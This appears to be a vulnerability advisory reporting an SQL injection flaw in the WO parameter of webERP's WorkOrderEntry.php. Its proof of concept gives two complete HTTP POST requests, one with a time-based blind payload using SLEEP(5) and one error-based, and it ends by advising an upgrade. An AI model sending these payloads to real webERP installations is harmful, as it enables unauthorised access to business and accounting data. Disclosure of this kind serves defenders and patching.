Overview
webERP is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an sql query.
Proof of Concept
Time-based Blind SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111 Content-Type: application/x-www-form-urlencoded Content-Length: 207 FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&;StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Error-based SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111 Content-Type: application/x-www-form-urlencoded Content-Length: 207 FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Solution
Upgrade to latest version here: http://sourceforge.net/projects/web-erp/
